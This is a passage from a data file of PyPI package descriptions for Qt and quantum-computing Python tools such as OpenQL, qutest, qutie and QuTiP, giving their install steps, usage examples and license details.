activity):http://www.vimperator.org/[Vimperator],http://bug.5digits.org/pentadactyl/index[Pentadactyl],https://github.com/akhodakivskiy/VimFx[VimFx] (seems to offer ahttps://gir.st/blog/legacyfox.htm[hack] to run on modern Firefox releases),https://github.com/shinglyu/QuantumVim[QuantumVim],https://github.com/ueokande/vim-vixen[Vim Vixen] (ESR only),https://github.com/amedama41/vvimpulation[VVimpulation],https://krabby.netlify.com/[Krabby]* Chrome/Chromium addons:https://github.com/k2nr/ViChrome/[ViChrome],https://github.com/jinzhu/vrome[Vrome],https://github.com/lusakasa/saka-key[Saka Key] (https://github.com/lusakasa/saka-key/issues/171[unmaintained]),https://github.com/1995eaton/chromium-vim[cVim],https://github.com/dcchambers/vb4c[vb4c] (fork of cVim, https://github.com/dcchambers/vb4c/issues/23#issuecomment-810694017[unmaintained]),https://glee.github.io/[GleeBox]* Addons for Safari:https://televator.net/vimari/[Vimari]License-------This program is free software: you can redistribute it and/or modifyit under the terms of the GNU General Public License as published bythe Free Software Foundation, either version 3 of the License, or(at your option) any later version.This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See theGNU General Public License for more details.You should have received a copy of the GNU General Public Licensealong with this program. If not, see .pdf.js------qutebrowser optionally uses https://github.com/mozilla/pdf.js/[pdf.js] todisplay PDF files in the browser. Windows releases come with a bundled pdf.js.pdf.js is distributed under the terms of the Apache License. 
You canfind a copy of the license in `qutebrowser/3rdparty/pdfjs/LICENSE` (in theWindows release or after running `scripts/dev/update_3rdparty.py`), or onlinehttps://www.apache.org/licenses/LICENSE-2.0.html[here]."} +{"package": "qutechopenql", "pacakge-description": "OpenQL FrameworkOpenQL is a framework for high-level quantum programming in C++/Python. The\nframework provides a compiler for compiling and optimizing quantum code. The\ncompiler produces the intermediate quantum assembly language and the compiled\nmicro-code for various target platforms. While the microcode is\nplatform-specific, the quantum assembly code\n(incQASMformat) is hardware-agnostic and\ncan be simulated on the QX simulator.OpenQL's source code is released under the Apache 2.0 license.For detailed user and contributor documentation, please visit theReadTheDocspage.DependenciesThe following utilities are required to compile OpenQL from sources:C++ compiler with C++23 support (gcc 11, clang 14, msvc 17)CMake>= 3.12gitPython3.x pluspip, with the following package:conan>= 2.0Python build specific dependenciesSWIG(Linux: >= 3.0.12, Windows: >= 4.0.0)Optionally:Documentation generation:doxygenConvert graphs fromdottopdf,png, etc:Graphviz DotutilityVisualize generated graphs indotformat:XDotUse the visualizer in MacOS:XQuartzAnd the following Python packages:plumbumqxelaratorsetuptoolswheelOptionally:Testing:numpy, andpytestDocumentation generation:m2r2,sphinx==7.0.0, andsphinx-rtd-themeARM specific dependenciesWe are having problems when using them4andzulu-opendjkConan packages on an ARMv8 architecture.m4is required by Flex/Bison andzulu-openjdkprovides the Java JRE required by the ANTLR generator.\nSo, for the time being, we are installing Flex/Bison and Java manually for this platform.Flex>= 2.6.4Bison>= 3.0Java JRE>= 11BuildThis version of OpenQL can only be compiled via theconanpackage manager.\nYou'll need to create a default profile before using it for the first time.The installation ofOpenQLdependencies, as well as the compilation, can be done in one go.git clone https://github.com/QuTech-Delft/OpenQL.git\ncd OpenQL\nconan profile detect\nconan build . -pr=conan/profiles/tests-debug -b missingNotice:theconan profilecommand only has to be run only once, and not before every build.theconan buildcommand is buildingOpenQLin Debug mode with tests using thetests-debugprofile.the-b missingparameter asksconanto build packages from sources\nin case it cannot find the binary packages for the current configuration (platform, OS, compiler, build type...).Build profilesA group of predefined profiles is provided under theconan/profilesfolder.\nThey follow the[tests-](debug|release)[-unitary]naming convention. For example:releaseis a Release build without tests and unitary decomposition disabled.tests-debug-unitaryis a Debug build with tests and unitary decomposition enabled.All the profiles set the C++ standard to 23.Build optionsProfiles are a shorthand for command line options. The command above could be written as well as:conan build . 
-s:h compiler.cppstd=23 -s:h openql/*:build_type=Debug -o openql/*:build_tests=True -o openql/*:disable_unitary=True -b missingThese are the list of options that could be specified whether in a profile or in the command line:openql/*:build_type: defaulted toRelease, set toDebugif you want Debug builds.openql/*:build_tests: defaulted toFalse, set toTrueif you want to build tests.openql/*:disable_unitary: defaulted toFalse, set toTrueif you want to disable unitary decomposition.openql/*:shared: defaulted toFalse, set toTrueif you want OpenQL to be built as a shared library.\nThe default option is mandatory on Windows.InstallFrom PythonInstall from the project root directory as follows:python3 -m pip install -v .You can test if it works by running:python3 -m pytest -vFrom C++TheCMakeLists.txtfile in the root directory includes install targets:conan create --version 0.11.2 . tests-debug -b missingYou can test if it works by doing:cd test/Debug\nctest -C Debug --output-on-failureUse from another projectFrom PythonAfter installation, you should be able to use the bindings for the original API by justimport openql as ql.\nThe new API doesn't have Python bindings yet.From C++The easiest way to use OpenQL in a CMake project is to fetch the library and then link against it.include(FetchContent)\nFetchContent_Declare(OpenQL\n GIT_REPOSITORY https://github.com/QuTech-Delft/OpenQL.git\n GIT_TAG \"\"\n)\nFetchContent_MakeAvailable(OpenQL)\ntarget_include_directories( SYSTEM PRIVATE \"${OpenQL_SOURCE_DIR}/include\")\ntarget_link_libraries( PUBLIC ql)Note that the following dependencies are required forOpenQLto build:Flex>= 2.6.4Bison>= 3.0Java JRE>= 11"} +{"package": "qutech-util", "pacakge-description": "qutil / qutech_utilLong term goal is to gather utility functions here.\nThe original name wasqutilbut we included the additional aliasqutech_utilso you can install it viapipy.\nIt is not meant as a lightweight package but some heavy dependencies like qcodes are feature gated.\nIf you don't have a reason for a lightweight install you should install all features i.e.qutil[complete].\nIf you just want to use it you can install the latest \"released\" version viapython-mpipinstallqutech-util[complete]However, this package profits from everybody's work and the releases are infrequent. Please make a development install\nand contribute your changes. You can do this viapython-mpipinstall-egit+https://git.rwth-aachen.de/qutech/qutil.git#egg=qutech-util[complete]This will download the source code (i.e. clone the git repository) into a subdirectory of the./srcargument and link the files into your environment instead of copying them. 
If you are on windows you can useSourceTreewhich is a nice GUI for git.\nYou can specify the source code directory with the--srcargument (which needs to be BEFORE-e):python-mpipinstall--srcsome_directory/my_python_source-egit+https://git.rwth-aachen.de/qutech/qutil.git#egg=qutech-util[complete]If you have already downloaded/cloned the package yourself you can usepython -m pip install -e .[complete].Please file an issue if any of these instructions does not work.TestsThere is no plan for writing extensive tests for the code in this package but please try to write proper docstrings for\nyour functions and include examples in them which can be checked viadoctest.\nFollow the link for an example for an example :)You can run the tests either viapython-mpytest--doctest-modulesor to check if everything works for a clean install (requires hatch to be installed)python-mhatchruntest:runDocumentationThe auto-generated documentation can be found atthe Gitlab Pages.To build the documentation locally, navigate todoc/and run either.\\make.bat html(on Windows),makehtml(on Unix), orsphinx-build -b html source buildMake sure the dependencies are installed viapython-mpipinstall-e.[doc]in the top-level directory.qutil.plottingThis module contains useful classes and functions surroundingmaptlotlibplots.cycle_plotshelps you cycling through many plots with the arrow keys (there are probably much better functions for this out there)plot_2d_dataframehelps you plot 2d data frames with numeric indicesBlitManagercan be used to significantly speed up plotting when certain parts of the plot, such as the artists on the canvas (lines, annotations, etc.) change but others do not (axes, labels, etc.) does not.CoordClickerandLineClickerallow some interactive selection of data.get_rwth_color_cycleand the predefinedrwth_color_cycleare cycler instances with the official RWTH corporate design colors:qutil.matlabIn this module there are functions that are helpful for reading.matfiles, especially those created with special measure.\nIt depends on the optionalmatlabfeature which is included in the complete install.\nIf you simply want to open a random.matfile you can usehdf5storage.loadmat.\nSome functionality requires the matlab engine python interface to work, i.e. python will use a MATLAB instance to open files.\nHowever, the matlab engine interface isnotinstalled by default because the install process depends on the version and fails if MATLAB is not installed.\nFor older MATLAB versions navigate to$MATLAB_INSTALL_FOLDER/extern/engines/pythonand executepython setup.py install.\nFor newer MATLAB versions you can install the engine interface viapython -m pip install matlabengine.Loading matlab files with \"newer\" MATLAB classes liketablerequires connecting (and starting) MATLAB instance.\nThe functionload_special_measure_with_matlab_enginecan load most special measure scans by utilizing the MATLAB engine interface. To use it you require a \"sufficiently new\" version of MATLAB and then navigate toC:\\Program Files\\MATLAB\\$VERSION\\extern\\engines\\pythonand callpython setup.py install.Recommended: There are dataclasses likeSimpleScanorVirtualScanthat are a python representation of certain common scan\ntypes and have a convenienceto_xarraymethod. Useload_simple_scan_with_matlab_engineorload_virtual_scan_with_matlab_engineto load them.There are the dataclassesFigureData,AxesDataandPlotDatathat represent matlab figure data. 
They help inspecting saved matlab figures with the help of a matlab engine.qutil.constThis module defines all the constants you could wish for as well as functions to convert temperatures (convert_temperature) or between wavelengths and frequencies (lambda2nu,nu2lambda). For an overview, see the module docstring.qutil.linalgThis module provides several handy linear algebra functions. While some are implemented elsewhere, the implementation here is typically speedier for large arrays. For example,pauli_expmexploits the fact that a matrix exponential of Pauli matrices can be written as a cosine times the identity matrix plus a sine times the Paulis to speed up the calculation.For an overview of the included functions, see the module docstring.qutil.uiThis module collects UI helpers, such as a progress bar for loops that can be used like so:foriinqutil.ui.progressbar(range(n)):do_something()qutil.qiIn this module there are some quantities and functions related to quantum information, like the Pauli matrices in different data types.qutil.randomHere we collect functions for random numbers likerandom_hermitianto generate random Hermitian matrices.qutil.itertoolsThis module contains everything fromitertools,more_itertoolsand custom functions.qutil.cachingHere you find decorators, functions and classes that help you implement caching likefile_cacheandlru_cache. This is helpful if you need to call computationally expensive functions with the same arguments repeatedly.qutil.ioUser input related functions likequery_yes_noor aCsvLoggerinterface (for reading use pandas.read_csv).to_global_pathresolves all network drive mappings (such asZ:\\) as well as domain names\n(such as\\\\janeway) to their global address (\\\\janeway.physik.rwth-aachen.dein this case).qutil.parallelFunctions and classes related to parallel execution i.e. multi-threading, multi-processing and asyncio.\nThere is a class for periodic callbacks from another threadThreadedPeriodicCallback.qutil.hardwareThis package contains little scripts to talk to various hardware devices. For example reading the leak tester via serial interface.qutil.electronicslumped_elementsExposes the contents offastz, a package for simple lumped-elements calculations. Overloads+and//to implement series and parallel connections, respectively.See thefastzdocumentation for more information.qutil.qcodesFunctions to convert from and to qcodes data sets. Currently only\nfrompandas.DataFrametoqcodes.data.data_set.DataSetqutil.measurementThis package is supposed to contain measurement-related functionality. It is currently empty besides some backward compatibility imports.spectrometerMoved tohttps://git.rwth-aachen.de/qutech/python-spectrometer.qutil.typecheckFunctions and decorators to help with runtime typechecking. 
Notably the@check_literalsdecorator to ensure that arguments match an annotated literal.\nImports thetypeguardwhich provides the powerful@typecheckeddecorator.fromtypingimportLiteral,Sequencefromqutil.typecheckimportcheck_literals@check_literalsdefmy_function(a:Sequence[int],b:Literal['forward','backward']):pass# do something# worksmy_function([1,2,3],'backward')# works because the first arguement is not checked at runtimemy_function({'no':'sequence'},'backward')# runtime error because of typo in 'backward'my_function('wrong','backwardd')qutil.pandas_toolsPandas utility functions for common code patterns.consecutive_groupbyis likepandas.DataFrame.groupbybut only\ngroups consecutive rows.qutil.imageImage and video processing tools.convert_tiffconverts a multipage.tifimage to a video with a format of choice usingmoviepy."} +{"package": "qutepart", "pacakge-description": "Code editor component for PyQt5NOTEwheels released on PyPi doesn't contain C extension which speedups long file hihglighting.\nBuild Qutepart from sources if speed is critical for your project. You can help releasing binary parser by implementingthis issueComponent has been created forEnki editorAPI documentationFeaturesSyntax highlighting for 196 languagesSmart indentation for many languagesLine numbersBookmarksAdvanced edit operationsMatching braces highlightingAutocompletion based on document contentMarking too long lines with red lineRectangular selection and copy-pasteVim modeQutepart and KatepartKateand Katepart (an editor component) is really cool software. The Kate authors and community have created, probably, the biggest set of highlighters and indenters for programming languages.Qutepart uses Kate syntax highlighters (XML files)Qutepart contains a port from Javascript to Python of Kate indenters (12% of the code base in version 1.0.0)Qutepart doesn't contain Katepart code.Nothing is wrong with Katepart. Qutepart has been created to enable reusing highlighters and indenters in projects where a KDE dependency is not acceptable.AuthorAndrei Kopatsandrei.kopats@gmail.comBug reports, patchesGithub pageLicenseLGPL v2"} +{"package": "qutest", "pacakge-description": "Thequtest.pypackage is atest-scriptrunner for theQUTest testing system.General RequirementsIn order to run tests in theQUTest environment, you need the following three components:Thetest fixture in C or C++running on a remote target (or the host computer)TheQSPY host applicationrunning and connected to the targetThequtest.pyscript runner and some test scripts.NOTE:Thequtest.pyscript runner requires standard Python 3, which is included in\ntheQTools distributionfor Windows\nand is typically included with other host operating systems, such as Linux and macOS.InstallationThequtest.pyscript runner can be used standalone, without installation in your Python system (seeExamples below).NOTE:Thequtest.pyscript is included in theQTools collection. 
Also, the QTools collection for Windows already includes Python 3, so you don't need to install anything extra.Alternatively, you can install thequtest.pypackage withpipfrom thePyPi indexby executing the following command:pip install qutestOr directly from the sources directory (e.g.,/qp/qtools/qutest):python setup.py install --install-dir=/qp/qtools/qutestUsingqutest.pyIf you are usingqutest.pyas a standalone Python script, you invoke it as follows:python3 /qutest.py Alternatively, if you've installedqutest.pywithpip, you invoke it as follows:qutest Command-line OptionsThe Python test scripts are executed by the QUTest test script runner 1qutest.py1 (typically located in 1qtools/qutest/ folder), with the following usage:ATTENTIONThequtest.pyscript runner command-line options have been expanded and changed at version 7.2.0. Unfortunately, it was not possible to preserve the backwards compatibility with the earlier versions.usage: python qutest.py [-h] [-v] [-e [EXE]] [-q [QSPY]] [-l [LOG]] [-o [OPT]] [scripts ...]\n\nQUTest test script runner\n\npositional arguments:\n scripts List (comma-separated) of test scripts to run\n\noptions:\n -h, --help show this help message and exit\n -v, --version Display QUTest version\n -e [EXE], --exe [EXE]\n Optional host executable or debug/DEBUG\n -q [QSPY], --qspy [QSPY]\n optional qspy host, [:ud_port][:tcp_port]\n -l [LOG], --log [LOG]\n Optional log directory (might not exist yet)\n -o [OPT], --opt [OPT]\n xcob: x:exit-on-fail, c:qspy-clear, o:qspy-save-txt, b:qspy-save-bin\n\nMore info: https://www.state-machine.com/qtools/qutest.html-x- optional flag that causesqutestto exit on first test failure.test_scripts- optional specification of the Python test scripts to run.\nIf not specified, qutest will try to run all *.py files in the current\ndirectory as test scriptshost_exe | DEBUG- optional specification of the test-fixture compiled\nfor the host (host executable) for testing on thehost computer.\nThe special valueDEBUGmeans thatqutestwill run in the \"debug mode\",\nin which it will NOT launch the host executables and it will wait for the\nTarget reset and other responses from the Target. Ifhost_exeis not\nspecified, anembedded targetis assumed (which is loaded with the test\nfixture alredy).qspy_host[:udp_port]- optional host-name/IP-address:port for the host\nrunning the QSPY host utility. If not specified, the default\nis 'localhost:7701'.tcp_port- optional the QSpy TCP port number for connecting\nhost executables. 
If not specified, the default is '6601'.NOTE:For reliable operation it is recommended to apply the short options without a space between the option and the parameter (e.g., 1-q192.168.1.100, -ocx1).Examples (for Windows):[1] python3 %QTOOLS%\\qutest\\qutest.py\n[2] python3 %QTOOLS%\\qutest\\qutest.py -- test_mpu.py\n[3] python3 %QTOOLS%\\qutest\\qutest.py -ebuild/test_dpp.exe\n[4] python3 %QTOOLS%\\qutest\\qutest.py -ebuild/test_dpp.exe -q192.168.1.100 -l../log -oco\n[5] qutest -qlocalhost:7702 -oxc -- test_qk.py,test_mpu.py\n[6] python3 %QTOOLS%\\qutest\\qutest.py -eDEBUG -- test_mpu.py[1]runs all test scripts (*.py) in the current directory on a remote target connected to QSPU host utility.[2]runs the test script test_mpu.py in the current directory on a remote target connected to QSPU host utility.[3]runs all test scripts (*.py) in the current directory and uses the host executable build/test_dpp.exe (test fixture).[4]runs all test scripts (*.py) in the current directory, uses the host executable build/test_dpp.exe (test fixture), and connects to QSPY running on a machine with IP address 192.168.1.100. Also produces QUTest log (-l) in the directory ../log. Also clears the QUTest screen before the run (-oc) and causes QSPY to save the text output to a file (-oo)[5]runs \"qutest\" (installed with pip) to execute the test scripts test_qk.py,test_mpu.py in the current directory, and connects to QSPY at UDP-host:port localhost:7701.[6]runs \"qutest\" in the DEBUG mode to execute the test script test_mpu.py in the current directory.Examples (for Linux/macOS):[1] python3 $(QTOOLS)/qutest/qutest.py\n[2] python3 $(QTOOLS)/qutest/qutest.py -- test_mpu.py\n[3] python3 $(QTOOLS)/qutest/qutest.py -ebuild/test_dpp\n[4] python3 $(QTOOLS)/qutest/qutest.py -ebuild/test_dpp -q192.168.1.100 -l../log -oco\n[5] qutest -qlocalhost:7702 -oxc -- test_qk.py,test_mpu.py\n[6] python3 $(QTOOLS)/qutest/qutest.py -eDEBUG -- test_mpu.py[1]runs all test scripts (*.py) in the current directory on a remote target connected to QSPU host utility.[2]runs the test script test_mpu.py in the current directory on a remote target connected to QSPU host utility.[3]runs all test scripts (*.py) in the current directory and uses the host executable build/test_dpp (test fixture).[4]runs all test scripts (*.py) in the current directory, uses the host executable build/test_dpp (test fixture), and connects to QSPY running on a machine with IP address 192.168.1.100. Also produces QUTest log (-l) in the directory ../log. Also clears the QUTest screen before the run (-oc) and causes QSPY to save the text output to a file (-oo)[5]runs \"qutest\" (installed with pip) to execute the test scripts test_qk.py,test_mpu.py in the current directory, and connects to QSPY at UDP-host:port localhost:7701.[6]runs \"qutest\" in the DEBUG mode to execute the test script test_mpu.py in the current directory.Generating Test LogsAs required for safety certification, thequtest.pytest runner can generate permanent records of the runs by producing log files. 
This feature is enabled by the-lcommand-line option.The various make-files supplied in QP/C and QP/C++ allow you to supply the command-line options for saving QUTest logs (by defining theLOG=symbol while invokingmake), for example:[1] make LOG=.\n[2] make LOG=../log\n[3] make LOG=c:/cert/logs[1]generates QUTest log file in the current directory (.)[2]generates QUTest log file in the../logdirectory (relative to the current directory)[3]generates QUTest log file in the absolute directoryc:/cert/logsThe following following listing shows the generated log file:Run ID : 221221_161550\nTarget : build/test_qutest.exe\n\n===================================[group]====================================\ntest_assert.py\n\nThis test group contains tests that intenionally FAIL,\nto exercise failure modes of the QUTest system.\n\n[ 1]--------------------------------------------------------------------------\nExpected assertion\n [ PASS ( 0.1s) ]\n[ 2]--------------------------------------------------------------------------\nUnexpected assertion (should FAIL!)\n @test_assert.py:22\nexp: \"0000000002 COMMAND CMD_A 0\"\ngot: \"0000000002 =ASSERT= Mod=test_qutest,Loc=100\"\n! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ![ FAIL ( 0.2s) ]\n[ 3]--------------------------------------------------------------------------\nSimple passing test\n [ PASS ( 0.1s) ]\n[ 4]--------------------------------------------------------------------------\nWrong assertion expectation (should FAIL!)\n @test_assert.py:32\nexp: \"0000000002 =ASSERT= Mod=test_qutest,Loc=200\"\ngot: \"0000000002 =ASSERT= Mod=test_qutest,Loc=100\"\n! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ![ FAIL ( 1.1s) ]\n[ 5]--------------------------------------------------------------------------\nSimple passing test\n [ PASS ( 0.1s) ]\n\n=================================[ SUMMARY ]==================================\n\nTarget ID : 221221_161031 (QP-Ver=720)\nLog file : ./qutest221221_161550.txt\nGroups : 1\nTests : 5\nSkipped : 0\nFAILED : 2 [ 2 4 ]\n\n==============================[ FAIL ( 2.7s) ]===============================More InformationMore information about the QUTest unit testing harness is available\nonline at:https://www.state-machine.com/qtools/qutest.htmlMore information about the QP/QSPY software tracing system is available\nonline at:https://www.state-machine.com/qtools/qpspy.html"} +{"package": "qute-style", "pacakge-description": "QuteStyleQuteStyle is an expandable application framework for PySide6 and heavily inspired byPyDracula.\nThe main goal of this project is to provide a simple and easy to use application frame that can be used to create a new application.\nIt is mainly suited for applications that rely on a center widget for user interaction. Functionality is extendable by having different widgets that can be loaded into that center widget area.Project statusTestsPackageFeaturesEasy integration of already existing widgetsPreset themes that easily can be modifiedCustom widgetsSplash screenBuild-in release historyUsed and developed in a productive environmentThemes and Styled WidgetsQuteStyle provides five themes, defining the color composition of the app.\nAdditionally, the user can define new themes (check this out). We provide five themes, for example a dark and light modeDarculaandHighbridge Grey.\nWe definedcustom widgets, such that they fit to the overall style and implemented new behaviour. 
A selection can be found in the Test-App:RequirementsPython 3.10+PySide6Installation Methodpip install qute-styleUsageimportsysfromqute_style_examples.sample_main_windowimportStyledMainWindowfromqute_style.qs_applicationimportQuteStyleApplicationfromqute_style.update_windowimportAppDataclassMyApplication(QuteStyleApplication):# take a look at qute_style_examples.sample_main_window and qute_style_examples.sample_widgets# to find out more about setting up a main window and the widgets that it# should displayMAIN_WINDOW_CLASS=StyledMainWindow# add basic information about your applicationAPP_DATA=AppData(\"Test-App\",\"2.3.4\",\":/svg_images/logo_qute_style.svg\",\":/svg_images/logo_qute_style.svg\",\"\",\"Test Version\",)if__name__==\"__main__\":APP_NAME=\"Test-App\"app=MyApplication(sys.argv)sys.exit(app.exec())For further information, see ourdocumentation.ExampleCheck out our example app by running:python -m qute_style_examplesLicenseThe original design idea is fromWanderson-Magalhaesand his projectPyDracula(MIT License).\nThe svg files are derived fromMaterial design icons(Apache License Version 2.0). Other files are covered by QuteStyle's MIT license.ContributingAll contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome."} +{"package": "qutewindow", "pacakge-description": "Qute WindowCross-platform frameless window based on Python and QtExamplesQute Window on macOSQute Window on WindowsFeaturesMoving (the title bar area is draggable)StretchingNative window shadowNative window animationsWin11 snap layoutInstalling via PIPpipinstallqutewindowUsageHere is a minimal example:importsysfromPySide6.QtWidgetsimportQApplicationfromqutewindowimportQuteWindowif__name__==\"__main__\":app=QApplication(sys.argv)demo=QuteWindow()demo.show()sys.exit(app.exec())"} +{"package": "qutie", "pacakge-description": "QutieYet another pythonic UI library for rapid prototyping using PyQt5.Quick startimportqutieasuiapp=ui.Application()window=ui.Widget(title=\"Example\",icon='orange',width=320,height=240,layout=ui.Column(ui.Label(\"Hello world!\"),ui.Row(ui.Button(\"Go!\",clicked=lambda:ui.show_info(text=\"Hello world!\")),ui.Button(\"Quit\",clicked=app.quit))))window.show()app.run()DocumentationQutie (pronounced ascutie) provides a simple and easy to use pythonic\ninterface to PyQt5.InstallpipinstallqutieApplicationA singleApplicationobject must be created before other widgets. To make use\nof the event system the application event loop must be executed.importqutieasui# Create an application object.app=ui.Application(name='app',version='1.0')# Create a window.window=ui.MainWindow()window.resize(800,600)window.show()# Run the event loop.app.run()WidgetsAny widget can be a top level window or part of another widget using thelayoutproperty. All properties can be assigned using the constructor.window=ui.Widget(title=\"Example\",width=320,height=240)To make a top level window visible use propertyvisibleor call methodshow().window.show()window.visible=True# equivalent to showLayoutsThe simplified layout system provides a horizontalRowand a verticalColumnbox. Items can be added while constructing the layout or using list like methodsappendandinsert. 
The consumed space of every child widget can be adjusted\nusing thestretchattribute.window.layout=ui.Row(ui.Column(...),ui.Column(ui.Row(...),ui.Row(...),ui.Row(...),stretch=(1,0,0)),stretch=(2,3))Inputs# Single line text inputtext=ui.Text(value=\"spam\")# Numeric inputnumber=ui.Number(value=4,minimum=0,maximum=10,step=1.0,decimals=1)# A multi line text areatextarea=ui.TextArea(value=\"Lorem ipsum et dolor.\")EventsEvents provide a simplified interface to Qt's signal and slot system. Events can\nbe emitted from any class inheriting fromObjectby calling methodemit().# Use any callable class attribute as event callback.window.issue_call=lambda:print(\"Call to action!\")# Emit an event executing attribute `issue_call` (if callable).window.emit('issue_call')Events can also propagate positional and keyword arguments.# Use any callable class attribute as event callback.window.update_progress=lambdaa,b:print(f\"Progress:{a}of{b}\")# Emit an event executing attribute `update_progress` (if callable).window.emit('update_progress',42,100)Many widgets provide predefined events.# Assigning callback functionsui.Number(value=4,changed=on_change,editing_finished=on_edited)TimersCall repeating or delayed events using timers.timer=ui.Timer(interval=1.0,timeout=lambda:print(\"Done!\"))timer.start()Functionsingle_shotexposes a convenient single shot timer.ui.single_shot(interval=1.0,timeout=lambda:print(\"Done!\"))Note that timer events are only processed when running the application event\nloop.SettingsPersistent settings can be stored/restored using aSettingsobject as context\nmanager. It provides application wide settings as a JSON dictionary.withui.Settings()assettings:value=settings.get('key','default')settings['key']=valueUse attributefilenameto inspect the persistent JSON data.>>>ui.Settings().filename'/home/user/.config/app.qutie'MenusMenu bars and menus behave like python lists.window=ui.MainWindow()file_menu=window.menubar.append(\"&File\")quit_action=file_menu.append(\"&Quit\")quit_action.triggered=window.closefoo_menu=window.menubar.insert(window.menubar.index(file_menu),\"&Foo\")file_menu=window.menubar.remove(file_menu)ToolbarsToolbars also behave like python lists, the main window toolbars property\nbehaves like a set.window=ui.MainWindow()toolbar=window.toolbars.add(\"toolbar\")toolbar.append(quit_action)toolbar.insert(quit_action)window.toolbars.remove(toolbar)WorkersTheWorkerclass provides a convenient way to work with background threads.\nUse attributetargetto assign the function to be executed in the background.defcalculate(worker):foriinrange(100):...worker=ui.Worker(target=calculate)worker.start()Important:use only the event system to propagate information from inside\nthe worker. 
Do not access widgets from within the worker function.defcalculate(worker):foriinrange(100):# Emit custom events.worker.emit('progress',i,100)worker.emit('message',\"All ok...\")worker=ui.Worker(target=calculate)# Assign custom event callbacks.worker.progress=lambdastep,max:print(f\"progress:{step}/{max}\")worker.message=lambdamsg:print(f\"message:{msg}\")worker.start()To control worker lifetime use methodstop()and attributestopping.defcalculate(worker):whilenotworker.stopping:...worker=ui.Worker(target=calculate)worker.start()...worker.stop()To wait for a worker to actually stop use methodjoin().worker.stop()worker.join()ExampleA simple dialog with progress bar running a calculation in the background.importrandomimporttimeimportqutieasuiclassDialog(ui.Dialog):def__init__(self,**kwargs):super().__init__(**kwargs)# Create workerself.worker=ui.Worker(target=self.calculate)self.worker.finished=self.closeself.worker.update_progress=self.update_progress# Create layoutself.progress_bar=ui.ProgressBar()self.layout=self.progress_bardefrun(self):# Start, stop and join workerself.worker.start()super().run()self.worker.stop()self.worker.join()defupdate_progress(self,value,maximum):self.progress_bar.maximum=maximumself.progress_bar.value=valuedefcalculate(self,worker):n=32foriinrange(n):ifworker.stopping:break# Emit custom eventworker.emit('update_progress',i,n)time.sleep(random.random())app=ui.Application()dialog=Dialog(title=\"Worker\")dialog.run()Something missing?Any underlying PyQt5 instance can be accessed directly using propertyqt.\nThis also enables to mix in custom PyQt5 classes and instances.widget.qt.setWindowTitle(\"Spam!\")widget.qt.customContextMenuRequested.connect(lambdapos:None)widget.qt.layout().addWidget(QtWidgets.QPusbButton())LicenseQutie is licensed under theGNU General Public License Version 3."} +{"package": "qutil", "pacakge-description": "qutilqutil is a simple library to test and execute SQL scripts from pythonInstallationUse the package managerpipto install qutil.pipinstallqutilLocal BuildCompile#file build on /buildpythonsetup.pysdist#.tar.gz build on /distpythonsetup.pysdistbdist_wheelInstallpipinstalldist/qutil-[version].tar.gz"} +{"package": "qutils", "pacakge-description": "UNKNOWN"} +{"package": "qutip", "pacakge-description": "QuTiP: Quantum Toolbox in PythonA. Pitchford,C. Granade,A. Grimsmo,N. Shammah,S. Ahmed,N. Lambert,E. Gigu\u00e8re,B. Li,J. Lishman,S. Cross,A. Galicia,P. D. Nation,\nandJ. R. 
Johansson.
QuTiP is open-source software for simulating the dynamics of closed and open quantum systems. It uses the excellent NumPy, SciPy, and Cython packages as numerical backends, and graphical output is provided by Matplotlib. QuTiP aims to provide user-friendly and efficient numerical simulations of a wide variety of quantum mechanical problems, including those with Hamiltonians and/or collapse operators with arbitrary time dependence, commonly found in a wide range of physics applications. QuTiP is freely available for use and/or modification, and it can be used on all Unix-based platforms and on Windows. Being free of any licensing fees, QuTiP is ideal for exploring quantum mechanics in research as well as in the classroom.
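To give a concrete flavour of the kind of problem described above, here is a minimal time-evolution sketch. It is illustrative only and not taken from the QuTiP README; it uses the standard qutip solver API (basis, sigmax, sigmaz, mesolve):
import numpy as np
from qutip import basis, sigmax, sigmaz, mesolve

# a qubit driven around the x axis
H = 2 * np.pi * 0.1 * sigmax()
psi0 = basis(2, 0)                      # start in |0>
times = np.linspace(0.0, 10.0, 100)

# closed-system evolution: no collapse operators, track <sigma_z>
result = mesolve(H, psi0, times, c_ops=[], e_ops=[sigmaz()])
print(result.expect[0][:5])             # expectation values at the first few times
Adding collapse operators to c_ops turns the same call into an open-system (Lindblad) simulation, which is the dissipative, time-dependent use case mentioned above.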
Support: We are proud to be affiliated with Unitary Fund and numFOCUS. QuTiP development is supported by Nori's lab at RIKEN, by the University of Sherbrooke, and by Aberystwyth University, among other supporting organizations.
Installation: QuTiP is available on both pip and conda (the latter in the conda-forge channel). You can install QuTiP from pip by doing pip install qutip to get the minimal installation. You can instead use the target qutip[full] to install QuTiP with all its optional dependencies. For more details, including instructions on how to build from source, see the detailed installation guide in the documentation. All back releases are also available for download in the releases section of this repository, where you can also find per-version changelogs. For the most complete set of release notes and changelogs for historic versions, see the changelog section in the documentation.
Documentation: The documentation for official releases, in HTML and PDF formats, can be found in the documentation section of the QuTiP website. The latest development documentation is available in this repository in the doc folder. A selection of demonstration notebooks is available, which demonstrate some of the many features of QuTiP. These are stored in the qutip/qutip-notebooks repository here on GitHub. You can run the notebooks online using myBinder.
Contribute: You are most welcome to contribute to QuTiP development by forking this repository and sending pull requests, or filing bug reports at the issues page. You can also help out with users' questions, or discuss proposed changes in the QuTiP discussion group. All code contributions are acknowledged in the contributors section in the documentation. For more information, including technical advice, please see the \"contributing to QuTiP development\" section of the documentation.
Citing QuTiP: If you use QuTiP in your research, please cite the original QuTiP papers that are available here."}
